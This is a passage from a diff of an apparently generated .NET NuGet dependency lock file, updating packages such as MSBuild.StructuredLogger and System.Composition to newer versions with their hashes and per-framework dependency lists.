"net7.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net8.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net9.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Win32.Primitives", "id": "Microsoft.Win32.Primitives", "version": "4.3.0", "sha512": "sha512-Nm8Hp51y9tYcK3xD6qk43Wjftrg1mdH24CCJsTb6gr7HS21U1uA+CKPGEtUcVZbjU1y8Kynzm5eoJ7Pnx5gm8A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Mono.Posix.NETStandard", "id": "Mono.Posix.NETStandard", "version": "1.0.0", "sha512": "sha512-RtGiutQZJAmajvQ0QvBvh73VJye85iW9f9tjZlzF88idLxNMo4lAktP/4Y9ilCpais0LDO0tpoICt9Hdv6wooA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MSBuild.StructuredLogger", "id": "MSBuild.StructuredLogger", "version": "2.2.243", "sha512": "sha512-Egw6dLclkDtfoVK+ncghRfYDEWiHjjmhbJFdqeZfqL/Ddtg+JoHzSMblBBTrn317coXZ7WMDELW3C9ZCpn0ByQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net462": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net47": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net471": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net472": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net48": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MSBuild.StructuredLogger", "id": "MSBuild.StructuredLogger", "version": "2.2.386", "sha512": "sha512-m8ErawcbeDJ+nWtN62vh2OPHARvLpSqhOBCedtYniPGB059wSs2vuGPxfBcVGqVcjpZgntEY4vDOzGyAVB7atA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Newtonsoft.Json", "id": "Newtonsoft.Json", "version": "13.0.3", "sha512": "sha512-mbJSvHfRxfX3tR/U6n1WU+mWHXswYc+SB/hkOpx8yZZe68hNZGfymJu0cjsaJEkVzCMqePiU6LdIyogqfIn7kg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Buffers", "id": "System.Buffers", "version": "4.6.0", "sha512": "sha512-iRbJyTSX9bJVpURLGLiW8Fgk5Vfm5iGCztw4IG4IJYcxJy+BXTCEgEWFeJtO6c+kPnUmQu87KK5m188+qbErcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Collections.Immutable", "id": "System.Collections.Immutable", "version": "8.0.0", "sha512": "sha512-BXqVkcIrhimvvem6q2ChWkuW6XYYirvb6FlhvuwaMoBqBdpcr4nehJBKP65Tw40UqcUM6oDoODsecM0yjZ6AUw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition", "id": "System.Composition", "version": "8.0.0", "sha512": "sha512-/AZ/S+sX6awiSeSvOv7997aiwbU6HCcOBJDLecdYQJjDo+4nYCrWwWKQQIZ38VZ6BLh1pDmcYFPZockIuoRIYw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net462": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net47": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net471": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net472": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net48": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition.AttributedModel", "id": "System.Composition.AttributedModel", "version": "8.0.0", "sha512": "sha512-gmEwpwXz+COPtuAASK+ichAg8+0oQAaPOV59g6fDdnt1KWbrymdixAn06bNbkdCUGcBXb8RX5k79cqg0Hqlv1g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition.Convention", "id": "System.Composition.Convention", "version": "8.0.0", "sha512": "sha512-MP7qMadQGUcMOEyGON5dmy9T+OXubvIx04kFHvTVPfZ/9+ns8dqmFToxoF7IDzJVSWmtOQHDUP2fL1x8F6slTA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel"], "net462": ["System.Composition.AttributedModel"], "net47": ["System.Composition.AttributedModel"], "net471": ["System.Composition.AttributedModel"], "net472": ["System.Composition.AttributedModel"], "net48": ["System.Composition.AttributedModel"], "net5.0": ["System.Composition.AttributedModel"], "net6.0": ["System.Composition.AttributedModel"], "net7.0": ["System.Composition.AttributedModel"], "net8.0": ["System.Composition.AttributedModel"], "net9.0": ["System.Composition.AttributedModel"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel"], "netcoreapp2.1": ["System.Composition.AttributedModel"], "netcoreapp2.2": ["System.Composition.AttributedModel"], "netcoreapp3.0": ["System.Composition.AttributedModel"], "netcoreapp3.1": ["System.Composition.AttributedModel"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel"], "netstandard2.1": ["System.Composition.AttributedModel"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition.Hosting", "id": "System.Composition.Hosting", "version": "8.0.0", "sha512": "sha512-HK6mWN38TLXo0jQOzR6so8cH1J8/6MzCfSsQS15bWbFEYKeonKRAZKyTC2E92o+wB1KCkocNpOy01ix61JnWjQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.Runtime"], "net462": ["System.Composition.Runtime"], "net47": ["System.Composition.Runtime"], "net471": ["System.Composition.Runtime"], "net472": ["System.Composition.Runtime"], "net48": ["System.Composition.Runtime"], "net5.0": ["System.Composition.Runtime"], "net6.0": ["System.Composition.Runtime"], "net7.0": ["System.Composition.Runtime"], "net8.0": ["System.Composition.Runtime"], "net9.0": ["System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.Runtime"], "netstandard2.1": ["System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition.Runtime", "id": "System.Composition.Runtime", "version": "8.0.0", "sha512": "sha512-hgGA3KDIx9FN3WYkpMvy0pUqWAul9BTehmqq49dqPxu5E+MbUKqgksU5XRP8M9LoBPZFa8FqBbKeFgCZ3rja2w==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Composition.TypedParts", "id": "System.Composition.TypedParts", "version": "8.0.0", "sha512": "sha512-rKu0GdZ4JYOWUF7br1W7UQFI/UgzWTU03CHY6tnTLZXCMth6YSADGJRRQYrLzpwh2+NuNcBIuv7a7x8J1xsfdw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net462": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net47": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net471": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net472": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net48": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Configuration.ConfigurationManager", "id": "System.Configuration.ConfigurationManager", "version": "8.0.0", "sha512": "sha512-WLn7WxNMGs8+pboojHpid8CJiNhcr2j7kA0gmI8fgU5LF0JGKGqHhSSHc8WW0h77svQSS29KO+hr+xKeuS2J9A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Security.Cryptography.ProtectedData"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Security.Cryptography.ProtectedData"], "net6.0": ["System.Security.Cryptography.ProtectedData"], "net7.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "net8.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "net9.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.1": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.2": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.1": ["System.Security.Cryptography.ProtectedData"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Security.Cryptography.ProtectedData"], "netstandard2.1": ["System.Security.Cryptography.ProtectedData"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Diagnostics.EventLog", "id": "System.Diagnostics.EventLog", "version": "8.0.0", "sha512": "sha512-um5/JzI6kqUKdoRX4qtIrMql36C6GQgspx2ntHO3HNO23QNuRC4Qn8Fe+7TCZ4gamEQJeuTt3Dy4hxUsjJURpQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Collections.Immutable", "id": "System.Collections.Immutable", "version": "9.0.0", "sha512": "sha512-z/Oo7nxWmZ0Y578vj8EUVrFJZ3DX6OMuUGlgeYgeeUZOFGT89XfaM8fDFMvJy6+mOIqW6ux5NdNzEnlTnQGJ7A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition", "id": "System.Composition", "version": "9.0.0", "sha512": "sha512-aWcyK90nIChHyxq7rpQ83Bbvt/t9l1X6yQtkvODaZ+rJlYHUMVpSji0YXIZTX5VlcWRCVRFdeEY767BCOzueaw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], 